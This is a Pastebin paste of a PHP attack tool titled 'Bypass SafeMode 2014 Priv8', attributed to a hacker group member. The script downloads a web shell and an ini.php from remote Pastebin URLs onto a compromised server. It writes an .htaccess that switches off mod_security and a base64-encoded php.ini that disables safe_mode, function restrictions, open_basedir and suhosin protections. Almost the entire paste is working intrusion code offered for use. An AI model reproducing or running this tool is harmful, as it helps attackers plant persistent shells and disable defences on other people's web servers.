Ribang

Bypass SafeMode 2014 Priv8

Dec 21st, 2017
345
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.00 KB | None | 0 0
  1.  
  2. <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
  3. <link rel="stylesheet" href="http://www.w32.info/2001/04/xmldsigmore">
  4. <style type="text/css">
  5. body {
  6. background:
  7. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  8. url("http://images3.alphacoders.com/142/142619.jpg") no-repeat center top,top left,top right;
  9. background-color: green;
  10. </style>
  11. <font face='Orbitron'>
  12.  
  13. <?
  14. error_reporting(0);
  15. /*
  16. #######################################
  17. #SafeMode Bypass 2014 Priv8 #
  18. #Coded By Mauritania Attacker #
  19. #GreetZ To All AnonGhost MemberZ #
  20. #######################################
  21. */
  22.  
  23.  
  24. echo "<form method='POST'>
  25. <title>Bypass SafeMode 2014 Priv8</title>
  26. <center><pre><font color='green' face='Orbitron' size='6' face='Tahoma'>Bypass SafeMode 2014 Priv8</pre></font></center>
  27. <center><font color='red' size='2' face='shell'>Cwd</font><input type='text' size='40' name='zero' value=".dirname(__FILE__)." <font color='green' size='8' face='Tahoma'></font></center>
  28. <center><font color='red' size='2' face='shell'>Shell</font><input type='text' size='40' name='shell' value='http://pastebin.com/raw.php?i=2gmt5XFH' <font color='green' size='8' face='Tahoma'></font></center>
  29. <center><font color='red' size='2' face='shell'>ini.php</font><input type='text' size='40' name='rim' value='http://pastebin.com/raw.php?i=sEbXwVvt' <font color='green' size='8' face='Tahoma'></font></center>
  30. <p><center><input type='submit' value='Bypass SafeMode' name='start' <font color=red' face='Tahoma, Geneva, sans-serif' style='font-size: 12pt'><br></font></center></p>";
  31. echo "<p><center><textarea rows='12' cols='60' style='font-family: impact size: 2pt ; color: green; border: 1px dotted red'>Results Will Appear Here ^_^
  32. ";
  33. if($_POST['start']) {
  34. $zero = $_POST['zero'];
  35. $file = $_POST['shell'];
  36. $mauritania = $_POST['rim'];
  37. $htaccess = "<IfModule mod_security.c>
  38. SecFilterEngine Off
  39. SecFilterScanPOST Off
  40. SecFilterCheckURLEncoding Off
  41. SecFilterCheckCookieFormat Off
  42. SecFilterCheckUnicodeEncoding Off
  43. SecFilterNormalizeCookies Off
  44. </IfModule>
  45. <Limit GET POST>
  46. order deny,allow
  47. deny from all
  48. allow from all
  49. </Limit>
  50. <Limit PUT DELETE>
  51. order deny,allow
  52. deny from all
  53. </Limit>
  54. SetEnv PHPRC $zero/ghost/php.ini";
  55.  
  56. $phpini = "c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";
  57. $dir = "ghost";
  58. if(file_exists($dir)) {
  59. echo "[+] ghost Folder Already Exist are you drunk :o xD !
  60. ";
  61. } else {
  62. @mkdir($dir); {
  63. echo "[+] ghost Folder Has Been Created Nygga :3 !
  64. ";
  65. } }
  66. # Generate Sh3LL
  67. $fopen = fopen("ghost/priv8.php5",'w');
  68. $shell = @file_get_contents($file);
  69. $swrite = fwrite($fopen ,$shell);
  70. if($swrite){
  71. echo "Shell Has Been Downloaded : $zero/ghost/priv8.php5
  72. ";
  73. } else {
  74. echo "Can't Download Shell :( do it manually :D
  75. ";
  76. }
  77. fclose($fopen);
  78. # Generate Htaccess
  79. $kolsv = fopen("ghost/.htaccess", "w");
  80. $hwrite = fwrite($kolsv, $htaccess);
  81. if($hwrite){
  82. echo ".htaccess Generated Successfully \!/
  83. ";
  84. } else {
  85. echo "Can't Generate Htaccess
  86. ";
  87. }
  88. fclose($kolsv);
  89. # Generate ini.php
  90. $xopen = fopen("ghost/ini.php",'w');
  91. $rim = @file_get_contents($mauritania);
  92. $zzz = fwrite($xopen ,$rim);
  93. if($zzz){
  94. echo "ini.php Has Been Downloaded \!/
  95. ";
  96. } else {
  97. echo "Can't Download ini.php :( do it manually :D
  98. ";
  99. }
  100. fclose($xopen);
  101.  
  102. $ini = fopen("ghost/php.ini" ,"w");
  103. $php = fwrite($ini, base64_decode($phpini));
  104. if($php){
  105. echo "PHP.INI Generated Successfully \!/";
  106. } else {
  107. echo "[-] Can't Generate PHP.INI";
  108. }
  109. }
  110. echo "</textarea></center></p><pre></pre>";
  111. echo '<center><font color="#ee5500" size="3pt">Coded By Mauritania Attacker</font><br><font color="#ff8f00" size="1pt">GreetZ : AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</font></center>';
  112.  
  113. ?>
Add Comment
Please, Sign In to add comment